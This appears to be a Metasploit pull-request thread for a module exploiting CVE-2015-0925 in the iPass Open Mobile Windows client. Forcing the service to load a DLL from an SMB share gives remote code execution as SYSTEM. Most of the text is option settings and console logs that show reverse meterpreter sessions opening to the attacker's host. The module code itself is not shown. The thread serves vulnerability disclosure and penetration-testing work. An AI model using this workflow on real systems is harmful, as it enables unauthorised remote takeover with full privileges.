Exploit module for CVE 2015-0925 (iPass Open Mobile Windows Client RCE)

[h0ng10]

This module exploits a vulnerability in the iPass Mobile Client 2.4.4 and earlier. Using a iPass service command on a named pipe it is possible to force the iPass service to load a DLL from a SMB share, allowing RCE as SYSTEM.

A vulnerable version can be found here:
http://ipass.drachenfels.de/download.aspx

If you have any questions, please let me know.

Example output

msf exploit(ipass_pipe_exec) > show options
Module options (exploit/windows/smb/ipass_pipe_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.XXX.190  yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass    XXXX             no        The password for the specified username
   SMBUser    user             no        The username to authenticate as
   SMB_DELAY  15               yes       Time that the SMB Server will wait for the payload request
   SRVHOST    192.168.XXX.164  yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    445              yes       The local port to listen on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.XXX.164  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf exploit(ipass_pipe_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.XXX.164:4444
[*] Server started.
[*] File available on \\192.168.XXX.164\XwlTs\pirKiTa.dll...
msf exploit(ipass_pipe_exec) > [*] Sending stage (972288 bytes) to 192.168.XXX.190
[*] Meterpreter session 6 opened (192.168.XXX.164:4444 -> 192.168.XXX.190:54634) at 2015-03-09 11:51:50 -0400
[*] Server stopped.

msf exploit(ipass_pipe_exec) > sessions -i 6
[*] Starting interaction with 6...

meterpreter >


meterpreter > getuid
Server username: $U$NTAUTORITT\SYSTEM-0x4e542d4155544f524954c4545c53595354454d
meterpreter >

[jvazquez-r7]

Thanks @h0ng10 ! Minor cleanup and landed, final result here: e035e6c

Test:

msf exploit(ipass_pipe_exec) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(ipass_pipe_exec) > [*] Server started.
[*] File available on \\172.16.158.1\tGong\cOnqwHf.dll...
[*] Sending stage (770048 bytes) to 172.16.158.134
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:63317) at 2015-03-12 16:33:49 -0500

msf exploit(ipass_pipe_exec) >
msf exploit(ipass_pipe_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : EXPLOITER
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...